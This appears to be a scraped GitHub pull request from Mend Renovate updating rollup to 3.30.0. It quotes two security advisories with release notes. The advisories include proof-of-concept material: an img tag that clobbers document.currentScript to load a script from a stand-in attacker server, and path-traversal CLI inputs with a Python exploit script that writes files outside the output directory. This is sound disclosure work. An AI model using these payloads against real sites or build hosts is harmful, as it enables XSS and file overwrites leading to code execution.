You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use import.meta.url or with plugins that emit and reference asset files from code in cjs/umd/iife format. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
We have identified a DOM Clobbering vulnerability in rollup bundled scripts, particularly when the scripts uses import.meta and set output in format of cjs/umd/iife. In such cases, rollup replaces meta property with the URL retrieved from document.currentScript.
However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element (e.g., an img tag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.
PoC
Considering a website that contains the following main.js script, the devloper decides to use the rollup to bundle up the program: rollup main.js --format cjs --file bundle.js.
var s = document.createElement('script')
s.src = import.meta.url + 'extra.js'
document.head.append(s)
The output bundle.js is shown in the following code snippet.
'use strict';
var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && False && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);
Adding the rollup bundled script, bundle.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server due to the introduced gadget during bundling. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
<!DOCTYPE html>
<html>
<head>
<title>rollup Example</title>
<!-- Attacker-controlled Script-less HTML Element starts--!>
<img name="currentScript" src="https://attacker.controlled.server/"></img>
<!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="bundle.js"></script>
<body>
</body>
</html>
Impact
This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of cjs, iife, or umd and use import.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.
Patch
Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.
The Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (../) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.
Details
The vulnerability is caused by the combination of two flawed components in the Rollup core:
Improper Sanitization: In src/utils/sanitizeFileName.ts, the INVALID_CHAR_REGEX used to clean user-provided names for chunks and assets excludes the period (.) and forward/backward slashes (/, \).
This allows path traversal sequences like ../../ to pass through the sanitizer unmodified.
Unsafe Path Resolution: In src/rollup/rollup.ts, the writeOutputFile function uses path.resolve to combine the output directory with the "sanitized" filename.
Because path.resolve follows the ../ sequences in outputFile.fileName, the resulting path points outside of the intended output directory. The subsequent call to fs.writeFile completes the arbitrary write.
PoC
A demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.
Scenario: CLI Named Input Exploit
Target a sensitive file location (for demonstration, we will use a file in the project root called pwned.js).
Execute Rollup with a specifically crafted named input where the key contains traversal characters:
Result: Rollup will resolve the output path for the entry chunk as dist + a/../../pwned.js, which resolves to the project root. The file pwned.js is created/overwritten outside the dist folder.
Reproduction Files provided :
vuln_app.js: Isolated logic exactly replicating the sanitization and resolution bug.
exploit.py: Automated script to run the PoC and verify the file escape.
vuln_app.js
constpath=require('path');constfs=require('fs');/** * REPLICATED ROLLUP VULNERABILITY * * 1. Improper Sanitization (from src/utils/sanitizeFileName.ts) * 2. Unsafe Path Resolution (from src/rollup/rollup.ts) */functionsanitize(name){// The vulnerability: Rollup's regex fails to strip dots and slashes, // allowing path traversal sequences like '../'returnname.replace(/[\u0000-\u001F"#$%&*+,:;<=>?[\]^`{|}\u007F]/g,'_');}asyncfunctionbuild(userSuppliedName){constoutputDir=path.join(__dirname,'dist');constfileName=sanitize(userSuppliedName);// Vulnerability: path.resolve() follows traversal sequences in the filenameconstoutputPath=path.resolve(outputDir,fileName);console.log(`[*] Target write path: ${outputPath}`);if(!fs.existsSync(path.dirname(outputPath))){fs.mkdirSync(path.dirname(outputPath),{recursive: true});}fs.writeFileSync(outputPath,'console.log("System Compromised!");');console.log(`[+] File written successfully.`);}build(process.argv[2]||'bundle.js');
exploit.py
importsubprocessfrompathlibimportPathdefrun_poc():
# Target a file outside the 'dist' folderpoc_dir=Path(__file__).parentmalicious_filename="../pwned_by_rollup.js"target_path=poc_dir/"pwned_by_rollup.js"print(f"=== Rollup Path Traversal PoC ===")
print(f"[*] Malicious Filename: {malicious_filename}")
# Trigger the vulnerable appsubprocess.run(["node", "poc/vuln_app.js", malicious_filename])
iftarget_path.exists():
print(f"[SUCCESS] File escaped 'dist' folder!")
print(f"[SUCCESS] Created: {target_path}")
# target_path.unlink() # Cleanupelse:
print("[FAILED] Exploit did not work.")
if__name__=="__main__":
run_poc()
Arbitrary File Write: Attackers can overwrite sensitive files like ~/.ssh/authorized_keys, .bashrc, or system binaries if the build process has sufficient privileges.
Supply Chain Risk: Malicious third-party plugins or dependencies can use this to inject malicious code into other parts of a developer's machine during the build phase.
User Impact: Developers running builds on untrusted repositories are at risk of system compromise.
Next steps: Take a moment to review the security alert above. Review
the linked package source code to understand the potential risk. Ensure the
package is not malicious before proceeding. If you're unsure how to proceed,
reach out to your security team or ask the Socket team for help at
support@socket.dev.
Suggestion: Remove or replace dependencies that include known critical CVEs. Consumers can use dependency overrides or npm audit fix --force to remove vulnerable dependencies.
Mark the package as acceptable risk. To ignore this alert only
in this pull request, reply with the comment
@SocketSecurity ignore npm/webpack@5.75.0. You can
also ignore all packages with @SocketSecurity ignore-all.
To ignore an alert for all future pull requests, use Socket's Dashboard to
change the triage state of this alert.
renovatebot
changed the title
chore(deps): update dependency rollup to v3.29.5 [security]
chore(deps): update dependency rollup to v3.30.0 [security]
Feb 26, 2026
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
This PR contains the following updates:
3.9.1→3.30.0GitHub Vulnerability Alerts
CVE-2024-47068
Summary
We discovered a DOM Clobbering vulnerability in rollup when bundling scripts that use
import.meta.urlor with plugins that emit and reference asset files from code incjs/umd/iifeformat. The DOM Clobbering gadget can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., animgtag with an unsanitizednameattribute) are present.It's worth noting that we’ve identifed similar issues in other popular bundlers like Webpack (CVE-2024-43788), which might serve as a good reference.
Details
Backgrounds
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
Gadget found in
rollupWe have identified a DOM Clobbering vulnerability in
rollupbundled scripts, particularly when the scripts usesimport.metaand set output in format ofcjs/umd/iife. In such cases,rollupreplaces meta property with the URL retrieved fromdocument.currentScript.https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L157-L162
https://github.com/rollup/rollup/blob/b86ffd776cfa906573d36c3f019316d02445d9ef/src/ast/nodes/MetaProperty.ts#L180-L185
However, this implementation is vulnerable to a DOM Clobbering attack. The
document.currentScriptlookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, thesrcattribute of the attacker-controlled element (e.g., animgtag ) is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.PoC
Considering a website that contains the following
main.jsscript, the devloper decides to use therollupto bundle up the program:rollup main.js --format cjs --file bundle.js.The output
bundle.jsis shown in the following code snippet.Adding the
rollupbundled script,bundle.js, as part of the web page source code, the page could load theextra.jsfile from the attacker's domain,attacker.controlled.serverdue to the introduced gadget during bundling. The attacker only needs to insert animgtag with the name attribute set tocurrentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.Impact
This vulnerability can result in cross-site scripting (XSS) attacks on websites that include rollup-bundled files (configured with an output format of
cjs,iife, orumdand useimport.meta) and allow users to inject certain scriptless HTML tags without properly sanitizing thenameoridattributes.Patch
Patching the following two functions with type checking would be effective mitigations against DOM Clobbering attack.
CVE-2026-27606
Summary
The Rollup module bundler (specifically v4.x and present in current source) is vulnerable to an Arbitrary File Write via Path Traversal. Insecure file name sanitization in the core engine allows an attacker to control output filenames (e.g., via CLI named inputs, manual chunk aliases, or malicious plugins) and use traversal sequences (
../) to overwrite files anywhere on the host filesystem that the build process has permissions for. This can lead to persistent Remote Code Execution (RCE) by overwriting critical system or user configuration files.Details
The vulnerability is caused by the combination of two flawed components in the Rollup core:
Improper Sanitization: In
src/utils/sanitizeFileName.ts, theINVALID_CHAR_REGEXused to clean user-provided names for chunks and assets excludes the period (.) and forward/backward slashes (/,\).This allows path traversal sequences like
../../to pass through the sanitizer unmodified.Unsafe Path Resolution: In
src/rollup/rollup.ts, thewriteOutputFilefunction usespath.resolveto combine the output directory with the "sanitized" filename.Because
path.resolvefollows the../sequences inoutputFile.fileName, the resulting path points outside of the intended output directory. The subsequent call tofs.writeFilecompletes the arbitrary write.PoC
A demonstration of this vulnerability can be performed using the Rollup CLI or a configuration file.
Scenario: CLI Named Input Exploit
pwned.js).rollup --input "a/../../pwned.js=main.js" --dir distdist + a/../../pwned.js, which resolves to the project root. The filepwned.jsis created/overwritten outside thedistfolder.Reproduction Files provided :
vuln_app.js: Isolated logic exactly replicating the sanitization and resolution bug.exploit.py: Automated script to run the PoC and verify the file escape.vuln_app.js
exploit.py
POC
rollup --input "bypass/../../../../../../../Users/vaghe/OneDrive/Desktop/pwned_desktop.js=main.js" --dir distImpact
This is a High level of severity vulnerability.
~/.ssh/authorized_keys,.bashrc, or system binaries if the build process has sufficient privileges.Release Notes
rollup/rollup (rollup)
v3.30.0Compare Source
3.30.0
2026-02-22
Features
Pull Requests
v3.29.5Compare Source
2024-09-21
Bug Fixes
Pull Requests
v3.29.4Compare Source
3.29.4
2023-09-28
Bug Fixes
Pull Requests
v3.29.3Compare Source
3.29.3
2023-09-24
Bug Fixes
Pull Requests
v3.29.2Compare Source
3.29.2
2023-09-15
Bug Fixes
TreeshakingPresettype (#5131)Pull Requests
TreeshakingPreset(@moltar)v3.29.1Compare Source
3.29.1
2023-09-10
Bug Fixes
Pull Requests
v3.29.0Compare Source
3.29.0
2023-09-06
Features
apito Plugin type (#5112)Bug Fixes
Pull Requests
v3.28.1Compare Source
3.28.1
2023-08-22
Bug Fixes
Pull Requests
v3.28.0Compare Source
3.28.0
2023-08-09
Features
preliminaryFileNameto generated chunks containing the file name placeholder (#5086)Bug Fixes
codeproperty of rendered modules in the output readonly (#5091)Pull Requests
preliminaryFileNametoOutputChunk(@lsdsjy)v3.27.2Compare Source
3.27.2
2023-08-04
Bug Fixes
Pull Requests
v3.27.1Compare Source
3.27.1
2023-08-03
Bug Fixes
Pull Requests
v3.27.0Compare Source
3.27.0
2023-07-28
Features
Object.valuesandObject.entriesas pure if their argument does not contain getters (#5072)Pull Requests
v3.26.3Compare Source
3.26.3
2023-07-17
Bug Fixes
manualChunksto avoid breaking existing configs (#5068)Pull Requests
v3.26.2Compare Source
3.26.2
2023-07-06
Bug Fixes
Pull Requests
v3.26.1Compare Source
3.26.1
2023-07-05
Bug Fixes
hasOwnPropertyas exported name in CommonJS (#5010)Pull Requests
v3.26.0Compare Source
3.26.0
2023-06-30
Features
--filterLogsCLI flag andROLLUP_FILTER_LOGSenvironment variable for log filtering (#5035)Pull Requests
v3.25.3Compare Source
3.25.3
2023-06-26
Bug Fixes
Pull Requests
v3.25.2Compare Source
3.25.2
2023-06-24
Bug Fixes
codeis not a string (#5042)Pull Requests
this.errorwithposintransformhook (@sapphi-red)v3.25.1Compare Source
3.25.1
2023-06-12
Bug Fixes
__NO_SIDE_EFFECTS__for async functions (#5031)Pull Requests
__NO_SIDE_EFFECTS__annotation for async function (@antfu)v3.25.0Compare Source
3.25.0
2023-06-11
Features
this.infoandthis.debugplugin context logging functions (#5026)onLogoption to read, map and filter logs (#5026)logLeveloption to fully suppress logs by level (#5026)this.warn,this.infoandthis.debugto avoid heavy computations based on log level (#5026)onLogplugin hook to read, filter and map logs from plugins (#5026)Pull Requests
v3.24.1Compare Source
3.24.1
2023-06-10
Bug Fixes
@rollup/plugin-commonjswere missing internal dependencies when code-splitting (#5029)process.exit(0)in watch mode to avoid issues in embedded scenarios (#5027)Pull Requests
v3.24.0Compare Source
3.24.0
2023-06-07
Features
/* #__NO_SIDE_EFFECTS__ */to mark function declarations as side effect free (#5024)Pull Requests
#__NO_SIDE_EFFECTS__annotation for function declaration (@antfu)v3.23.1Compare Source
3.23.1
2023-06-04
Bug Fixes
Pull Requests
v3.23.0Compare Source
3.23.0
2023-05-22
Features
Bug Fixes
Pull Requests
v3.22.1Compare Source
3.22.1
2023-05-21
Bug Fixes
Pull Requests
v3.22.0Compare Source
3.22.0
2023-05-17
Features
experimentalMinChunkSizeto take tree-shaking into account (#4989)Bug Fixes
experimentalMinChunkSize(#4989)Pull Requests
v3.21.8Compare Source
3.21.8
2023-05-16
Bug Fixes
Pull Requests
v3.21.7Compare Source
3.21.7
2023-05-13
Bug Fixes
Pull Requests
v3.21.6Compare Source
3.21.6
2023-05-09
Bug Fixes
Pull Requests
v3.21.5Compare Source
3.21.5
2023-05-05
Bug Fixes
Pull Requests
v3.21.4Compare Source
3.21.4
2023-05-03
Bug Fixes
Pull Requests
v3.21.3Compare Source
3.21.3
2023-05-02
Bug Fixes
process.exit()when Rollup CLI finishes successfully to solve issues on some systems (#4969)Pull Requests
v3.21.2Compare Source
3.21.2
2023-04-30
Bug Fixes
Pull Requests
v3.21.1Compare Source
3.21.1
2023-04-29
Bug Fixes
argumentsvariable (#4965)Pull Requests
v3.21.0Compare Source
3.21.0
2023-04-23
Features
Pull Requests
v3.20.7Compare Source
3.20.7
2023-04-21
Bug Fixes
Pull Requests
v3.20.6Compare Source
3.20.6
2023-04-18
Bug Fixes
Pull Requests
v3.20.5Compare Source
3.20.5
2023-04-18
Bug Fixes
Pull Requests
v3.20.4Compare Source
3.20.4
2023-04-17
Bug Fixes
Pull Requests
v3.20.3Compare Source
3.20.3
2023-04-16
Bug Fixes
shouldTransformCachedModule(#4932)Pull Requests
v3.20.2Compare Source
3.20.2
2023-03-24
Bug Fixes
Pull Requests
v3.20.1Compare Source
3.20.1
2023-03-23
Bug Fixes
Pull Requests
v3.20.0Compare Source
3.20.0
2023-03-20
Features
Bug Fixes
Pull Requests
v3.19.1Compare Source
3.19.1
2023-03-10
Bug Fixes
Pull Requests
output.sanitizeFileNamesection (@0x009922)v3.19.0Compare Source
3.19.0
2023-03-09
Features
Pull Requests
npm run dev(@lukastaegert)v3.18.0Compare Source
3.18.0
2023-03-01
Features
experimentalLogSideEffectsto log the first detected side effect in every module (#4871)Pull Requests
node_modulesas ignore-listed by default (@bmeurer)v3.17.3Compare Source
3.17.3
2023-02-25
Bug Fixes
Pull Requests
import.meta.urlin CommonJS (@fasttime)v3.17.2Compare Source
3.17.2
2023-02-20
Bug Fixes
moduleSideEffectsset totrue(#4867)needsCodeReferenceproperty in TypeScript for asset tree-shaking (#4868)Pull Requests
needsCodeReferenceproperty toEmittedAsset(@sapphi-red)v3.17.1Compare Source
3.17.1
2023-02-18
Bug Fixes
loadConfigFile(#4853)moduleSideEffects: false(#4866)Pull Requests
v3.17.0[Compare Sour
Configuration
📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.
♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 Ignore: Close this PR and you won't be reminded about this update again.
This PR was generated by Mend Renovate. View the repository job log.